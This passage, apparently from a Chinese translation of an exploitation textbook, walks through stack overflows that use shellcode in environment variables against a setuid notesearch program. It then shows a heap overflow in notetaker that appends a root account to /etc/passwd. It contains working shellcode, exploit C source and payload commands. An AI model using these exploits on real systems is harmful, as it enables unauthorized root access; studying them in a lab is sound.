当使用正确的偏移量时，返回地址会被覆盖为一个指向 NOP sled 上某个位置的值。当执行尝试返回到该位置时，它将滑入注入的 shellcode 指令。这就是默认偏移量值被发现的方式。

使用环境变量

有时缓冲区可能太小，甚至无法容纳 shellcode。幸运的是，内存中还有其他位置可以存放 shellcode。环境变量被用户 shell 用于各种目的，但它们被用于什么目的并不重要，重要的是它们位于栈上，并且可以从 shell 中设置。下面的示例将名为MYVAR的环境变量设置为字符串test。可以通过在其名称前加美元符号来访问这个环境变量。此外，env命令将显示所有环境变量。注意，已经设置了一些默认环境变量。

reader@hacking:~/booksrc $ export MYVAR=test
reader@hacking:~/booksrc $ echo $MYVAR
test
reader@hacking:~/booksrc $ env
SSH_AGENT_PID=7531
SHELL=/bin/bash
DESKTOP_STARTUP_ID=
TERM=xterm
GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-gnome2
WINDOWID=39845969
OLDPWD=/home/reader
USER=reader
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;
01:or=4
0;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:
*.arj=01;
31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:
*.deb=01;31:*
.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:
*.pgm=01;35
:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:
*.mov=01;
35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:
*.xwd=01;
35:*.flac=01;35:*.mp3=01;35:*.mpc=01;35:*.ogg=01;35:*.wav=01;35:
SSH_AUTH_SOCK=/tmp/ssh-EpSEbS7489/agent.7489
GNOME_KEYRING_SOCKET=/tmp/keyring-AyzuEi/socket
SESSION_MANAGER=local/hacking:/tmp/.ICE-unix/7489
USERNAME=reader
DESKTOP_SESSION=default.desktop
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
GDM_XSERVER_LOCATION=local
PWD=/home/reader/booksrc
LANG=en_US.UTF-8
GDMSESSION=default.desktop
HISTCONTROL=ignoreboth
HOME=/home/reader
SHLVL=1
GNOME_DESKTOP_SESSION_ID=Default
LOGNAME=reader
DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-
DxW6W1OH1O,guid=4f4e0e9cc6f68009a059740046e28e35
LESSOPEN=| /usr/bin/lesspipe %s
DISPLAY=:0.0
`MYVAR=test`
LESSCLOSE=/usr/bin/lesspipe %s %s
RUNNING_UNDER_GDM=yes
COLORTERM=gnome-terminal
XAUTHORITY=/home/reader/.Xauthority
_=/usr/bin/env
reader@hacking:~/booksrc $

同样，shellcode 可以放入环境变量中，但首先它需要是我们容易操作的形式。notesearch 漏洞中的 shellcode 可以用来；我们只需要将其放入一个二进制格式的文件中。标准的 shell 工具head、grep和cut可以用来隔离 shellcode 的十六进制展开字节。

reader@hacking:~/booksrc $ head exploit_notesearch.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
reader@hacking:~/booksrc $ head exploit_notesearch.c | grep "^\""
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
reader@hacking:~/booksrc $ head exploit_notesearch.c | grep "^\"" | cut -d\" -f2
\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89
\xe1\xcd\x80
reader@hacking:~/booksrc $

程序的前 10 行被管道传输到grep，它只显示以引号开头的行。这可以隔离包含 shellcode 的行，然后使用选项将它们管道传输到cut，以显示两个引号之间的字节。

BASH 的 for 循环实际上可以用来将每一行发送到echo命令，带有命令行选项以识别十六进制展开并抑制在末尾添加换行符。

reader@hacking:~/booksrc $ for i in $(head exploit_notesearch.c | grep "^\"" | cut -d\"
 -f2)

> do
> echo -en $i
> done > shellcode.bin
reader@hacking:~/booksrc $ hexdump -C shellcode.bin 
00000000  31 c0 31 db 31 c9 99 b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 51 89 e2 53 89  |//shh/bin..Q..S.|
00000020  e1 cd 80                                          |...|
00000023 
reader@hacking:~/booksrc $

现在我们有一个名为shellcode.bin的文件，其中包含 shellcode。这可以通过命令替换与 shellcode 一起放入环境变量中，并附带一个慷慨的 NOP 滑梯。

reader@hacking:~/booksrc $ export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat
 shellcode.bin)
reader@hacking:~/booksrc $ echo $SHELLCODE
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣1␣1␣1␣␣␣ j
                                     XQh//shh/bin␣␣Q␣␣S␣␣
reader@hacking:~/booksrc $

就这样，shellcode 现在被放在了栈中的环境变量里，附带一个 200 字节的 NOP 滑梯。这意味着我们只需要在该滑梯范围内的某个地址上覆盖保存的返回地址即可。环境变量位于栈的底部附近，因此在调试器中运行 notesearch 时，我们应该在这里查找。

reader@hacking:~/booksrc $ gdb -q ./notesearch
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x804873c
(gdb) run
Starting program: /home/reader/booksrc/notesearch

Breakpoint 1, 0x0804873c in main ()
(gdb)

在main()的开始处设置一个断点，并运行程序。这将设置程序的内存，但在发生任何操作之前会停止。现在我们可以检查栈底附近的内存。

(gdb) i r esp
esp            0xbffff660      0xbffff660
(gdb) x/24s $esp + 0x240
0xbffff8a0:      ""
0xbffff8a1:      ""
0xbffff8a2:      ""
0xbffff8a3:      ""
0xbffff8a4:      ""
0xbffff8a5:      ""
0xbffff8a6:      ""
0xbffff8a7:      ""
0xbffff8a8:      ""
0xbffff8a9:      ""
0xbffff8aa:      ""
0xbffff8ab:      "i686"
0xbffff8b0:      "/home/reader/booksrc/notesearch"
0xbffff8d0:      "SSH_AGENT_PID=7531"
`0xbffffd56:      "SHELLCODE=", '\220' <repeats 190 times>...`
0xbffff9ab:      "\220\220\220\220\220\220\220\220\220\2201ï¿½1ï¿½1ï¿½\231ï¿½ï¿½ï¿½\200j\vXQh//
shh/bin\211ï¿½Q\211ï¿½S\211ï¿½ï¿½\200"
0xbffff9d9:      "TERM=xterm"
0xbffff9e4:      "DESKTOP_STARTUP_ID="
0xbffff9f8:      "SHELL=/bin/bash"
0xbffffa08:      "GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-gnome2"
0xbffffa43:      "WINDOWID=39845969"
0xbffffa55:      "USER=reader"
0xbffffa61:
"LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;
33;01:or=
40;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:
*.arj=01
;31:*.taz=0"...
0xbffffb29:
"1;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:
*.rpm=01;3
1:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:
*.ppm=01
;35:*.tga=0"...
(gdb) x/s 0xbffff8e3
0xbffff8e3:      "SHELLCODE=", '\220' <repeats 190 times>...
(gdb) x/s 0xbffff8e3 + 100
0xbffff947:      '\220' <repeats 110 times>, "1ï¿½1ï¿½1ï¿½\231ï¿½ï¿½ï¿½\200j\vXQh//shh/bin\
211ï¿½Q\211ï¿½S\211ï¿½ï¿½\200"
(gdb)

调试器揭示了 shellcode 的位置，如上图中加粗所示。（当程序在调试器外运行时，这些地址可能略有不同。）调试器还有一些关于栈的信息，这会稍微改变地址。但是，如果有 200 字节的 NOP 滑梯，如果选择滑梯中间的地址，这些不一致性就不会成为问题。在上面的输出中，地址0xbffff947显示接近 NOP 滑梯的中间，这应该给我们足够的操作空间。在确定注入的 shellcode 指令的地址后，利用方法就是简单地用这个地址覆盖返回地址。

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x47\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3.2# whoami
root 
sh-3.2#

目标地址被重复足够多次以溢出返回地址，执行返回到环境变量中的 NOP 滑梯，不可避免地导致 shellcode。在溢出缓冲区不足以容纳 shellcode 的情况下，可以使用带有大 NOP 滑梯的环境变量。这通常使利用变得容易得多。

一个巨大的 NOP 滑梯在需要猜测目标返回地址时非常有帮助，但结果表明，环境变量的位置比局部栈变量的位置更容易预测。在 C 的标准库中有一个名为getenv()的函数，它接受环境变量的名称作为其唯一参数，并返回该变量的内存地址。getenv_example.c中的代码展示了getenv()的使用。

`getenv_example.c`

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
   printf("%s is at %p\n", argv[1], getenv(argv[1]));
}

编译并运行此程序将显示给定环境变量在内存中的位置。这为预测目标程序运行时相同环境变量将位于何处提供了更准确的预测。

reader@hacking:~/booksrc $ gcc getenv_example.c
reader@hacking:~/booksrc $ ./a.out SHELLCODE
SHELLCODE is at 0xbffff90b
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x0b\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]------- 
sh-3.2#

使用大 NOP 滑梯时，这已经足够准确，但如果没有滑梯尝试做同样的事情，程序会崩溃。这意味着环境预测仍然不准确。

reader@hacking:~/booksrc $ export SLEDLESS=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./a.out SLEDLESS
SLEDLESS is at 0xbfffff46
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x46\xff\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $

为了能够预测一个确切的内存地址，必须探索地址之间的差异。正在执行程序的名称长度似乎对环境变量的地址有影响。通过更改程序名称并进行实验可以进一步探索这种影响。这种实验和模式识别对于黑客来说是一项重要的技能。

reader@hacking:~/booksrc $ cp a.out a
reader@hacking:~/booksrc $ ./a SLEDLESS
SLEDLESS is at 0xbfffff4e
reader@hacking:~/booksrc $ cp a.out bb
reader@hacking:~/booksrc $ ./bb SLEDLESS
SLEDLESS is at 0xbfffff4c
reader@hacking:~/booksrc $ cp a.out ccc
reader@hacking:~/booksrc $ ./ccc SLEDLESS
SLEDLESS is at 0xbfffff4a
reader@hacking:~/booksrc $ ./a.out SLEDLESS
SLEDLESS is at 0xbfffff46
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfffff4e - 0xbfffff46
$1 = 8
(gdb) quit
reader@hacking:~/booksrc $

如前所述的实验显示，执行程序的名称长度会影响导出环境变量的位置。一般趋势似乎是在程序名称长度每增加一个字节的情况下，环境变量的地址减少两个字节。这对于程序名称 a.out 也是成立的，因为 a.out 和 a 之间的长度差异是四个字节，而地址 0xbfffff4e 和 0xbfffff46 之间的差异是八个字节。这意味着执行程序的名称也位于某个位置的栈上，这导致了偏移。

带着这种知识，当易受攻击的程序执行时，可以预测环境变量的确切地址。这意味着可以消除 NOP 滑梯的辅助手段。getenvaddr.c 程序根据程序名称长度的差异调整地址，以提供非常准确的预测。

getenvaddr.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char *ptr;

   if(argc < 3) {
      printf("Usage: %s <environment var> <target program name>\n", argv[0]);
      exit(0);
   }
   ptr = getenv(argv[1]); /* Get env var location. */
   ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* Adjust for program name. */
   printf("%s will be at %p\n", argv[1], ptr);
}

当编译时，此程序可以准确预测在目标程序执行期间环境变量将在内存中的位置。这可以用来利用基于栈的缓冲区溢出，而无需 NOP 滑梯。

reader@hacking:~/booksrc $ gcc -o getenvaddr getenvaddr.c
reader@hacking:~/booksrc $ ./getenvaddr SLEDLESS ./notesearch
SLEDLESS will be at 0xbfffff3c
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x3c\xff\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999

如您所见，利用程序并不总是需要利用代码。在命令行中进行利用时，使用环境变量可以大大简化事情。但也可以使用这些变量来使利用代码更加可靠。

在 notesearch_exploit.c 程序中，使用 system() 函数执行命令。此函数启动一个新的进程，并使用 /bin/sh -c 运行命令。-c 告诉 sh 程序执行从命令行参数传递给它的命令。可以使用 Google 的代码搜索来查找此函数的源代码，这将告诉我们更多信息。请访问 www.google.com/codesearch?q=package:libc+system 以查看此代码的完整内容。

来自 libc-2.2.2 的代码

int system(const char * cmd)
{
        int ret, pid, waitstat;
        void (*sigint) (), (*sigquit) ();

        `if ((pid = fork()) == 0) {                 execl("/bin/sh", "sh", "-c", cmd, NULL);                 exit(127);         }`
        if (pid < 0) return(127 << 8);
        sigint = signal(SIGINT, SIG_IGN);
        sigquit = signal(SIGQUIT, SIG_IGN);
        while ((waitstat = wait(&ret)) != pid && waitstat != -1);
        if (waitstat == -1) ret = -1;
        signal(SIGINT, sigint);
        signal(SIGQUIT, sigquit);
        return(ret);
}

该函数的重要部分以粗体显示。fork() 函数启动一个新的进程，而 execl() 函数用于通过 /bin/sh 运行命令，并带有适当的命令行参数。

使用 system() 有时可能会引起问题。如果一个 setuid 程序使用 system()，权限不会传递，因为从版本二开始 /bin/sh 就在放弃权限。这种情况并不适用于我们的漏洞利用，但漏洞利用实际上也不需要启动新的进程。我们可以忽略 fork()，只关注 execl() 函数来运行命令。

execl() 函数属于一组通过替换当前进程为新进程来执行命令的函数。execl() 的参数从目标程序的路径开始，后面跟着每个命令行参数。第二个函数参数实际上是零号命令行参数，即程序的名称。最后一个参数是一个 NULL，用于终止参数列表，类似于空字节终止字符串的方式。

execl() 函数有一个姐妹函数叫做 execle()，它有一个额外的参数来指定执行进程应该运行的环境。这个环境以每个环境变量的空终止字符串指针数组的形式呈现，环境数组本身以一个 NULL 指针终止。

使用 execl() 时，会使用现有的环境，但如果使用 execle()，则可以指定整个环境。如果环境数组只是作为第一个字符串的 shellcode（以 NULL 指针终止列表），则唯一的环境变量将是 shellcode。这使得其地址很容易计算。在 Linux 中，地址将是 0xbffffffa 减去环境中的 shellcode 长度，减去执行程序名称的长度。由于这个地址将是精确的，因此不需要 NOP sled。漏洞利用缓冲区中只需要地址，重复足够次数以溢出栈中的返回地址，如 exploit_nosearch_env.c 所示。

exploit_notesearch_env.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   char *env[2] = {shellcode, 0};
   unsigned int i, ret;

   char *buffer = (char *) malloc(160);

   ret = 0xbffffffa - (sizeof(shellcode)-1) - strlen("./notesearch");
   for(i=0; i < 160; i+=4)
      *((unsigned int *)(buffer+i)) = ret;

   execle("./notesearch", "notesearch", buffer, 0, env);
   free(buffer);
}

这个漏洞利用方法更可靠，因为它不需要 NOP sled 或对偏移量的任何猜测。此外，它不会启动任何额外的进程。

reader@hacking:~/booksrc $ gcc exploit_notesearch_env.c
reader@hacking:~/booksrc $ ./a.out
-------[ end of note data ]------- 
sh-3.2#

其他段的溢出

缓冲区溢出也可能发生在其他内存段，如堆和 bss。在 auth_overflow.c 中，如果重要的变量位于易受溢出攻击的缓冲区之后，程序的控制流可能会被改变。这一点适用于这些变量所在的任何内存段；然而，控制通常相当有限。能够找到这些控制点并学会充分利用它们只需要一些经验和创造性思维。虽然这些类型的溢出不像基于栈的溢出那样标准化，但它们同样有效。

基于堆的基本溢出

来自第 0x200 章的记事本程序也容易受到缓冲区溢出漏洞的影响。在堆上分配了两个缓冲区，第一个命令行参数被复制到第一个缓冲区。这里可能会发生溢出。

来自 notetaker.c 的摘录

   buffer = (char *) ec_malloc(100);
   datafile = (char *) ec_malloc(20);
   strcpy(datafile, "/var/notes");

   if(argc < 2)                // If there aren't command-line arguments,
      usage(argv[0], datafile); // display usage message and exit.

   `strcpy(buffer, argv[1]);  // Copy into buffer.`

   printf("[DEBUG] buffer   @ %p: \'%s\'\n", buffer, buffer);
   printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

在正常情况下，缓冲区分配位于 0x804a008，在 datafile 分配的 0x804a070 之前，正如调试输出所示。这两个地址之间的距离是 104 字节。

reader@hacking:~/booksrc $ ./notetaker test
[DEBUG] buffer   @ 0x804a008: 'test'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0x804a070 - 0x804a008
$1 = 104
(gdb) quit
reader@hacking:~/booksrc $

由于第一个缓冲区是空终止的，因此在不溢出到下一个缓冲区的情况下，可以放入此缓冲区的最大数据量应该是 104 字节。

reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "A"x104')
[DEBUG] buffer   @ 0x804a008: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[DEBUG] datafile @ 0x804a070: ''
[!!] Fatal Error in main() while opening file: No such file or directory
reader@hacking:~/booksrc $

如预期的那样，当尝试 104 字节时，空终止字节溢出到 datafile 缓冲区的开始处。这导致 datafile 只是一个单独的空字节，显然不能作为一个文件打开。但如果 datafile 缓冲区被覆盖的内容不仅仅是空字节呢？

reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "A"x104 . "testfile"')
[DEBUG] buffer   @ 0x804a008: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtestfile'
[DEBUG] datafile @ 0x804a070: 'testfile'
[DEBUG] file descriptor is 3
Note has been saved.
*** glibc detected *** ./notetaker: free(): invalid next size (normal): 0x0804a008 ***
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6[0xb7f017cd]
/lib/tls/i686/cmov/libc.so.6(cfree+0x90)[0xb7f04e30]
./notetaker[0x8048916]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xdc)[0xb7eafebc]
./notetaker[0x8048511]
======= Memory map: ========
08048000-08049000 r-xp 00000000 00:0f 44384      /cow/home/reader/booksrc/notetaker
08049000-0804a000 rw-p 00000000 00:0f 44384      /cow/home/reader/booksrc/notetaker
0804a000-0806b000 rw-p 0804a000 00:00 0          [heap]
b7d00000-b7d21000 rw-p b7d00000 00:00 0
b7d21000-b7e00000 ---p b7d21000 00:00 0
b7e83000-b7e8e000 r-xp 00000000 07:00 15444      /rofs/lib/libgcc_s.so.1
b7e8e000-b7e8f000 rw-p 0000a000 07:00 15444      /rofs/lib/libgcc_s.so.1

b7e99000-b7e9a000 rw-p b7e99000 00:00 0
b7e9a000-b7fd5000 r-xp 00000000 07:00 15795      /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd5000-b7fd6000 r--p 0013b000 07:00 15795      /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd6000-b7fd8000 rw-p 0013c000 07:00 15795      /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd8000-b7fdb000 rw-p b7fd8000 00:00 0
b7fe4000-b7fe7000 rw-p b7fe4000 00:00 0
b7fe7000-b8000000 r-xp 00000000 07:00 15421      /rofs/lib/ld-2.5.so
b8000000-b8002000 rw-p 00019000 07:00 15421      /rofs/lib/ld-2.5.so
bffeb000-c0000000 rw-p bffeb000 00:00 0          [stack]
ffffe000-fffff000 r-xp 00000000 00:00 0          [vdso]
Aborted
reader@hack ing:~/booksrc $

这次，溢出被设计用来用字符串 testfile 覆盖 datafile 缓冲区。这导致程序将数据写入 testfile 而不是按照最初编程的方式写入 /var/notes。然而，当通过 free() 命令释放堆内存时，检测到堆头错误，程序被终止。与堆溢出导致的返回地址覆盖类似，堆架构本身内部存在控制点。glibc 的最新版本使用的是专门为了对抗堆解除链接攻击而演化的堆内存管理函数。自 2.2.5 版本以来，这些函数已被重写，以便在检测到堆头信息问题时打印调试信息并终止程序。这使得 Linux 中的堆解除链接变得非常困难。然而，这个特定的漏洞利用并没有使用堆头信息来施展其魔法，因此在调用 free() 之前，程序已经被欺骗写入了一个新的文件，并且具有 root 权限。

reader@hacking:~/booksrc $ grep -B10 free notetaker.c

   if(write(fd, buffer, strlen(buffer)) == -1) // Write note.
      fatal("in main() while writing buffer to file");
   write(fd, "\n", 1); // Terminate line.

// Closing file
   if(close(fd) == -1)
      fatal("in main() while closing file");

   printf("Note has been saved.\n");
   free(buffer);
   free(datafile);
reader@hacking:~/booksrc $ ls -l ./testfile
-rw------- 1 root reader 118 2007-09-09 16:19 ./testfile
reader@hacking:~/booksrc $ cat ./testfile
cat: ./testfile: Permission denied
reader@hacking:~/booksrc $ sudo cat ./testfile
?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
AAAAAAAAAtestfile
reader@hacking:~/booksrc $

读取字符串直到遇到空字节，因此整个字符串作为 userinput 写入文件。由于这是一个 suid root 程序，因此创建的文件属于 root。这也意味着，由于可以控制文件名，可以将数据追加到任何文件。尽管这些数据有一些限制；它必须以受控的文件名结束，并且还会写入一个包含用户 ID 的行。

可能存在几种巧妙的方式来利用这种能力。最明显的一种是将内容追加到 /etc/passwd 文件中。该文件包含系统中所有用户的用户名、ID 和登录 shell。显然，这是一个关键的系统文件，所以在对其进行大量操作之前，制作一个备份副本是个好主意。

reader@hacking:~/booksrc $ cp /etc/passwd /tmp/passwd.bkup
reader@hacking:~/booksrc $ head /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
reader@hacking:~/booksrc $

/etc/passwd 文件中的字段由冒号分隔，第一个字段是登录名，然后是密码，用户 ID，组 ID，用户名，家目录，最后是登录 shell。密码字段都填充了 x 字符，因为加密密码存储在别处的一个影子文件中。（然而，这个字段可以包含加密密码。）此外，任何具有用户 ID 为 0 的密码文件条目都将获得 root 权限。这意味着目标是向密码文件追加一个具有 root 权限和已知密码的额外条目。

密码可以使用单向哈希算法进行加密。由于算法是单向的，原始密码不能从哈希值中重新创建。为了防止查找攻击，算法使用一个盐值，该值的变化会为相同的输入密码生成不同的哈希值。这是一个常见的操作，Perl 有一个 crypt() 函数可以执行这个操作。第一个参数是密码，第二个是盐值。使用不同的盐值生成的相同密码会产生不同的盐。

reader@hacking:~/booksrc $ perl -e 'print crypt("password", "AA"). "\n"'
AA6tQYSfGxd/A
reader@hacking:~/booksrc $ perl -e 'print crypt("password", "XX"). "\n"'
XXq2wKiyI43A2
reader@hacking:~/booksrc $

注意到盐值总是在哈希的开始处。当用户登录并输入密码时，系统会查找该用户的加密密码。使用存储的加密密码中的盐值，系统使用相同的单向哈希算法加密用户输入的任何文本作为密码。最后，系统比较这两个哈希值；如果它们相同，则用户必须输入了正确的密码。这允许使用密码进行身份验证，而无需在系统上的任何地方存储密码。

在密码字段中使用这些哈希值之一将使账户的密码为 password，无论使用的盐值如何。要追加到 /etc/passwd 的行可能看起来像这样：

myroot:XXq2wKiyI43A2:0:0:me:/root:/bin/bash

然而，这个特定的堆溢出漏洞的性质不允许将这条确切的行写入 /etc/passwd，因为字符串必须以 /etc/passwd 结尾。然而，如果将那个文件名仅仅追加到条目末尾，密码文件条目就会不正确。这可以通过巧妙地使用符号文件链接来补偿，这样条目就可以以 /etc/passwd 结尾，同时仍然是密码文件中的一个有效行。下面是如何工作的：

reader@hacking:~/booksrc $ mkdir /tmp/etc
reader@hacking:~/booksrc $ ln -s /bin/bash /tmp/etc/passwd
reader@hacking:~/booksrc $ ls -l /tmp/etc/passwd
lrwxrwxrwx 1 reader reader 9 2007-09-09 16:25 /tmp/etc/passwd -> /bin/bash
reader@hacking:~/booksrc $

现在 /tmp/etc/passwd 指向登录 shell /bin/bash。这意味着密码文件的合法登录 shell 也是 /tmp/etc/passwd，因此以下行是一个有效的密码文件行：

myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd

这行值的修改只需稍微调整，使得在 /etc/passwd 之前的部分正好是 104 字节长：

reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp"' | wc
 -c
38
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x50 .
 ":/root:/tmp"'
| wc -c
86
reader@hacking:~/booksrc $ gdb -q
(gdb) p 104 - 86 + 50
$1 = 68
(gdb) quit
reader@hacking:~/booksrc $ `perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x68 .  ":/root:/tmp"'`
| wc -c
104
reader@hacking:~/booksrc $

如果将 /etc/passwd 添加到那个最终字符串的末尾（如粗体所示），上面的字符串将被追加到 /etc/passwd 文件的末尾。由于这一行定义了一个具有我们设置的密码的 root 权限账户，因此访问此账户并获得 root 权限不会很难，如下面的输出所示。

reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "myroot:XXq2wKiyI43A2:0:0:"
 . "A"x68 .
":/root:/tmp/etc/passwd"')
[DEBUG] buffer   @ 0x804a008: 'myroot:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:/root:/tmp/etc/passwd'
[DEBUG] datafile @ 0x804a070: '/etc/passwd'
[DEBUG] file descriptor is 3
Note has been saved.
*** glibc detected *** ./notetaker: free(): invalid next size (normal): 0x0804a008 ***
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6[0xb7f017cd]
/lib/tls/i686/cmov/libc.so.6(cfree+0x90)[0xb7f04e30]
./notetaker[0x8048916]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xdc)[0xb7eafebc]
./notetaker[0x8048511]
======= Memory map: ========
08048000-08049000 r-xp 00000000 00:0f 44384      /cow/home/reader/booksrc/notetaker
08049000-0804a000 rw-p 00000000 00:0f 44384      /cow/home/reader/booksrc/notetaker
0804a000-0806b000 rw-p 0804a000 00:00 0          [heap]
b7d00000-b7d21000 rw-p b7d00000 00:00 0
b7d21000-b7e00000 ---p b7d21000 00:00 0
b7e83000-b7e8e000 r-xp 00000000 07:00 15444      /rofs/lib/libgcc_s.so.1
b7e8e000-b7e8f000 rw-p 0000a000 07:00 15444      /rofs/lib/libgcc_s.so.1
b7e99000-b7e9a000 rw-p b7e99000 00:00 0
b7e9a000-b7fd5000 r-xp 00000000 07:00 15795      /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd5000-b7fd6000 r--p 0013b000 07:00 15795      /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd6000-b7fd8000 rw-p 0013c000 07:00 15795      /rofs/lib/tls/i686/cmov/libc-2.5.so
b7fd8000-b7fdb000 rw-p b7fd8000 00:00 0
b7fe4000-b7fe7000 rw-p b7fe4000 00:00 0
b7fe7000-b8000000 r-xp 00000000 07:00 15421      /rofs/lib/ld-2.5.so
b8000000-b8002000 rw-p 00019000 07:00 15421      /rofs/lib/ld-2.5.so
bffeb000-c0000000 rw-p bffeb000 00:00 0          [stack]
